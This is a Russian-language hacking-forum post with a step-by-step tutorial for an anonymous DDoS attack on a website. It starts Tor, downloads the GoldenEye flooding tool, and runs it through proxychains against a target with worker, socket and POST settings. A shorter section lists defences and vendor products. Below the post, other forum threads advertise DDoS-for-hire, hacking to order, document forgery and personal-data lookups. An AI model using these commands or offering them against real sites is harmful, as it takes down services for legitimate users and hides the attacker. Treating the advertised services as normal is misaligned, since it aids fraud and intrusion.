Отказ от обслуживания. Анонимная DDoS атака на веб-сайт с помощью GoldenEye и способы защиты

Admin

Original poster
Administrator
Сообщения
929
Реакции
735
Посетить сайт
DDOS.png
Кратко о «Дудосе»
Что это такое?

Википедия гласит:

DDoS (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Distributed Denial of Service, дословно «Распределенный отказ в обслуживании») —

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.
Как работает данная атака и кто ею пользуется?

У каждого веб-сервера имеются ограничения по количеству запросов, которые веб-сервер может может обслуживать одновременно. Если количество запросов будет превышать допустимую норму — вполне возможно следующее:

  1. Замедление работы сервера (замедление обработки запросов)
  2. Полный отказ в обслуживании запросов
Чаще всего злоумышленники добиваются второго — полного отказа в обслуживании. Мотивы могут быть разными: начиная с защиты пользователей от мошеннических сайтов и заканчивая банальной скукой.

Но следует сказать, что пользуются данными атаками не только злоумышленники, но и «белые хакеры», т.е. пентестеры. Этой атакой этичные хакеры тестируют веб-сервера на мощность и способность обрабатывать большое количество запросов одновременно.

Работает DDoS так: злоумышленник создает сеть из «зомби-компьютеров» (на самом деле это не обязательно компьютеры: годными для данной атаки являются все устройства, способные отправлять запросы), и впоследствии использует эту сеть для проведения атаки.

Представим ситуацию: максимальный вес трафика, который может принимать сервер — 1 Гб. Злоумышленник пытается достичь или преодолеть этот барьер. Если получается — сервер сначала тормозит, а потом может и лечь.

Теперь самое интересное: как провести подобную атаку? Сразу предупредим — все, описанное и рассказанное ниже предоставлено лишь в ознакомительных целях. Чужие сервера ломать нельзя, за это могут быть проблемы законом. Мы тебя предупредили.
Необходимые инструменты
  1. EtherApe - графический монитор сети, который графически отображает сетевую активность. Хосты и ссылки меняются в размере с трафиком. Отображение цветовых протоколов.
  2. Service Tor - Tor позволяет клиентам и ретрансляторам предлагать скрытые услуги. То есть вы можете предложить веб-сервер, SSH-сервер и т.д. Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains - последняя версия Proxychains поддерживает SOCKS5, SOCKS4 и HTTP CONNECT. Прокси-цепи можно смешивать с разными типами прокси.
  4. GoldenEye - GoldenEye - приложение на python, предназначенное только для целей тестирования безопасности.
Как выполнить DDOS атаку на сайт?
1. Запустите etherape: etherape, появится всплывающее окно, которое графически отображает сетевую активность.

2. Запустите службу TOR:

service tor start

3. Загрузите Goldeneye


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


wget

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



4. После загрузки распакуйте его в папку

unzip GoldenEye-master.zip

5. Начать атаку

/GoldenEye-master# proxychains ./goldeneye.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



b7979bfffbe78d61550fa.png

  • Добавьте значения для рабочих (-w), сокетов (-s) и метода (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

Если вы не остановите атаку, то в некоторых случаях она "взорвется". Чтобы остановить атаку просто нажмите CTRL+C.
Готово. Через какое-то время сервер будет тормозить, а затем, возможно, ляжет.

Общая защита от DDOS-атаки
  • Снижение скорости IP-соединения.
  • Используйте IDS, межсетевые экраны веб-приложений.
  • Tweak Connection на порог IP.
  • Защитите свои DNS-серверы.
  • Установите средства защиты. Убедитесь, что у вас установлены соответствующие средства защиты как для ваших сетей, так и для ваших приложений. Сюда входят такие ключевые инструменты, как брандмауэры, программное обеспечение для мониторинга сети и антивирусные программы, а также системы мониторинга угроз. С их помощью вы можете отслеживать базовый сетевой трафик и настраивать оповещения о необычном поведении.
  • Держите все в курсе. Все эти системы должны быть обновлены, чтобы гарантировать, что любые ошибки или проблемы исправлены. Обнаружение угроз как можно раньше - лучший способ предотвратить атаку DDoS-атак на важные сетевые инфраструктуры и повлиять на конечных пользователей.
Инструменты для предотвращения DDoS-атак
Есть несколько инструментов, которые я рекомендую для предотвращения и остановки DDoS-атак.

1. Security Event Manager
Для отслеживания поведения сети и маркировки угроз до того, как они станут чрезмерными, мне нравится SolarWinds Security Event Manager (SEM).

e046e9efad1df39cab843.png

Способность быстро реагировать на угрозу жизненно необходима, поскольку инициативы в области безопасности могут быстро стать бесполезными, если их развертывание займет слишком много времени. SEM включает в себя автоматические ответы, которые могут блокировать подозрительный IP или USB, отключать вредоносные устройства или отключать их привилегии, а также уничтожать приложения, которые ведут себя неожиданным образом. Это означает, что задержки при работе с чем-то вроде атаки DDoS сводятся к минимуму.

SEM также контролирует целостность файлов и USB, поэтому, если что-то выглядит не так, его можно остановить.

SolarWinds SEM предлагается бесплатно для тридцатидневной пробной версии. После этого вы можете посмотреть цены для каждого узла.

2. Cloudflare
4327ae5bb701daea85ff1.png

Cloudflare предлагает гибкий и масштабируемый инструмент, который объединяет несколько методов предотвращения DDoS в одном решении. Он предотвращает проникновение вредоносного и злонамеренного трафика в вашу сеть, а остальная часть сети остается функциональной и высокопроизводительной. Cloudflare использует базу данных репутации для отслеживания потенциальных угроз от злоумышленников.

Для предприятий Cloudflare стоит 200 долларов США в месяц, но на уровне предприятия вам необходимо связаться с Cloudflare для получения расценок.

3. Imperva
51a064bf9a360e03e6165.png

Средство защиты Imperva DDoS защищает всю сеть и защищает от атак с помощью обработки пакетов большой емкости. Он обеспечивает защиту от DDoS-атак как всегда, так и по требованию, в зависимости от того, что больше всего подходит вашему бизнесу, а также включает в себя автоматическое обновление панелей мониторинга, отображающих информацию о трафике атак. Основным недостатком инструмента Imperva является то, что он ограничен защитой от DDoS-атак.
 

Вложения

  • 1579953569920.png
    1579953569920.png
    53.8 КБ · Просмотры: 7
Последнее редактирование:
Название темы
Автор Заголовок Раздел Ответы Дата
Videntis Продам ⚕️CОVID-19 | ЕU Green Pass cost from 150€ more than 30 countries | PФ от 2500₽ | Сертификаты официально / Vaccination Certificates ✅ Аккаунты/Админки/Документы 2
Videntis Продам [Досье] Комплексный пробив Физических Лиц РФ/UA от 350₽ (расширенное) Пробив информации/Прозвоны 3
Ёшкин_кот Промокод от ivi Другое 0
adflak Кликер для AdSense + Гарантированный заработок от 200$ в месяц Продажа софта 11
Aimer2033 Интересно Яндекс маркет 500руб скидка от 2500руб Другое 0
Ddoscrabs Проверено Premium ddos от Crabs Спам / Флуд / Ддос 5
AzazeLienTeam Продам Отрисовка документов от AzazeLienTeam Услуги дизайнеров/веб-разработчиков 2
W Заказать услуги Хакера,Взлом на заказ от [email protected] взлом базы данных,удаленный доступ (telegram,Viber,Whatsapp,Gmail,vk.com,OK.ru) Если Корзина 0
P На проверке База данных от Кота Матроскина (БАДы, физ лица) Доступы - FTP, shell'ы, руты, sql-inj, БД 1
GetLeads Рассылка в Директ. Инстаграм от 10 копеек! Вайбер от 30 коп! Ищу работу. Предлагаю свои услуги. 1
A Делаем от 5000 рублей на БОНУСХАНТИНГЕ Способы заработка 0
W Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому. Корзина 0
Simple-ddos service Ddos от Simple-ddos service. Обход защит. Аренда панели. Спам / Флуд / Ддос 0
C На проверке Продам клон BTC Ethereum USDT за 50% от номинала Куплю/Обменяю 1
B Проверено Рисуем так, что верят везде. Отрисовка от Bluebird Ищу работу. Предлагаю свои услуги. 3
adflak Продам Aéza — облачные серверы от 0.82р/час с AntiDDoS. Попробуйте бесплатно! Дедики/VPN/соксы/ssh 0
A Слив схемы заработка от 3000 рублей в день Корзина 6
A Alotofservers - выделенные серверы от 720 рублей Сайты/Хостинг/Сервера 0
Ю Зарабатывай от 140 000 рублей в месяц за 3 часа работы в день! Корзина 0
eValidator Сервис проверки email на валидность от eValidator Ищу работу. Предлагаю свои услуги. 3
C Куплю Аккаунты Paxful с репутацией от 10 Аккаунты/Админки/Документы 0
H Пассивный заработок на криптокоине SAT (от 100 $ в месяц) Корзина 0
VenomService Базы от VenomService (Форумы/Email/Tg Чаты) Трафик, загрузки, инсталлы, iframe 1
VenomService Рассылки от VenomService (Telegram/Email) Все что не подошло по разделу 1
VenomService Дизайн от VenomService (Банеры/Аватарки/Логотипы) Услуги дизайнеров/веб-разработчиков 1
T Защитим твой ресурс от блокировки Роскомнадзора Продажа софта 7
zladey1986 Интересно Уникальный авторский метод пожизненного дохода от 30$ в день (2021) Способы заработка 6
S Рекламная подписка от Яндекс.Бизнеса на платформе getUNIQ Способы заработка 0
M Если ли возможность защититься от админа сервера? Вопросы и интересы 0
ReliZ031 Интересно Качественный окуп MYR. Вам от 40% Ищу работу. Предлагаю свои услуги. 0
Denik Интересно Слив курса по анонимности от Paranoid Другое 1
Valiento_Salyami Продам Пролью трафик за 20% от спэнда. Трафик, загрузки, инсталлы, iframe 1
adflak Публикация статей в 20 популярнейших ресурсах c Majestic от 20 Ищу работу. Предлагаю свои услуги. 2
vfxAlert Партнерка от vfxAlert - надежный способ монетизировать финансовый трафик! Все что не подошло по разделу 3
PONCHO [Белое] Плачу от 200р за 5 минут. Лёгкая верификация. Предоставляю работу. Ищу специалиста. 0
roxy_hide Куплю Гифт скуп сервис от Roxy Куплю/Обменяю 0
ONPROXY Продам ONPROXY.NET Приватные прокси по доступным ценам от 25 рублей за штуку. Промо-код: discount на 35% Дедики/VPN/соксы/ssh 0
andre5787 Арбитраж трафика от Василия Нашибы Способы заработка 0
Legendary_Fantomas Взлом ВКонтакте на заказ от Фантомаса Ищу работу. Предлагаю свои услуги. 4
adflak Трастовые статейные ссылки + Бонусы. Траст от 30 Ищу работу. Предлагаю свои услуги. 1
A Вконтакте от 3 рублей - Автореги, С голосами, Владельцы групп! Аккаунты/Админки/Документы 1
lizun [АКТУАЛЬНО][Легкий заработок для всех][от 500руб в день][Без ограничений по заработку] Способы заработка 18
ALFA16 Интересно CasT-Security.ru Приватная защита от DDoS-атак Ищу работу. Предлагаю свои услуги. 0
Степан Степаныч Уникальный авторский метод пожизненного дохода от 30$ в день Обучения, схемы, мануалы 7
alreadead Бесплатно до 100$ от Currency.com за 15 минут. Способы заработка 0
Khan В продажу выставлены смартфоны Google Pixel 4a с прошивкой от ФБР Новости в сети 0
NikitaKit $$$Продам брут на сайт,с которого можно вытянуть данные от крипто кошельков$$$ Продажа софта 5
V Продам Продажа дедиков от 80 рублей по странам Дедики/VPN/соксы/ssh 1
kirick7 Как защититься от фишинга? Вопросы и интересы 9
proxy-solutions.net Партнерская программа от компании Proxy-Solutions.net. Получайте процент от всех платежей на сайте! Предоставляю работу. Ищу специалиста. 0

Название темы